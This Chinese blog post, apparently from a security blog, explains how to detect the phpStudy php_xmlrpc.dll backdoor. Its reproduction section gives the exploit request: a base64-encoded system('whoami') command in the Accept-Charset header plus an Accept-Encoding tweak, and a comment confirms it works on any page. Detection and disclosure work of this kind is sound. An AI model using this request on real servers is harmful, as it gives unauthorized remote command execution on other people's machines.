TypechoJoeTheme

MUCN博客

统计
登录
用户名
密码
/
注册
用户名
邮箱

[渗透]php study后门检测

2020-09-06
/
3 评论
/
960 阅读
/
正在检测是否收录...
09/06

php study后门

  • phpstudy后门影响版本
phpstudy 2016版php-5.4
phpstudy 2018版php-5.2.17
phpstudy 2018版php-5.4.45
  • 后门位置

后门代码存在于extphp_xmlrpc.dll模块中

  • phpStudy2016路径

phpphp-5.2.17extphp_xmlrpc.dll
phpphp-5.4.45extphp_xmlrpc.dll

phpphp-5.2.17extphp_xmlrpc.dll
phpphp-5.4.45extphp_xmlrpc.dll

漏洞证明:

  • notepad(可点击notepad下载中文版npp)打开此文件查找@eval,文件存在@eval(%s(‘%s’))证明漏洞存在


漏洞复现

  • 访问本地搭建漏洞环境

  • 抓包:

  • 修改请求包内容:

添加请求头:

Accept-Charset:你需要执行的命令(base64加密)

另外:

Accept-Encoding: gzip, deflate//删除deflate前的空格
system('whoami');
base64编码为:c3lzdGVtKCd3aG9hbWknKTs=

成功执行system函数(命令执行函数)
后续不再赘述。


  • 有关检测工具:
  • 本人自写检测程序:

https://gitee.com/mucn/codes/r8oinpdqlfv2t19bwkm7y72


  • windows下检测phpstudy后门工具
  • 作者:RG

phpstudy后门检测.zip

朗读
赞(1)
版权属于:

MUCN博客

本文链接:

https://mucn.site/index.php/%E6%B8%97%E9%80%8F/234.html(转载时请注明本文出处及文章链接)

评论 (3)
  1. 菜鸡中的菜鸡 作者
    Windows 10 · Google Chrome

    啊,这太强了,大师傅,请问这里如果手工检测的话,任何页面都可以用那个修改请求包的方式检测吗?还是需要在首页进行抓包测试呢??

    2020-09-26 回复
    1. Mucn 作者
      Windows 7 · Google Chrome
      @菜鸡中的菜鸡

      嗯嗯 每个界面都可以手动测试

      2020-09-30 回复
      1. 菜鸡中的菜鸡 作者
        Windows 10 · Google Chrome
        @Mucn

        灰常感谢大佬,学习到了

        2020-10-02 回复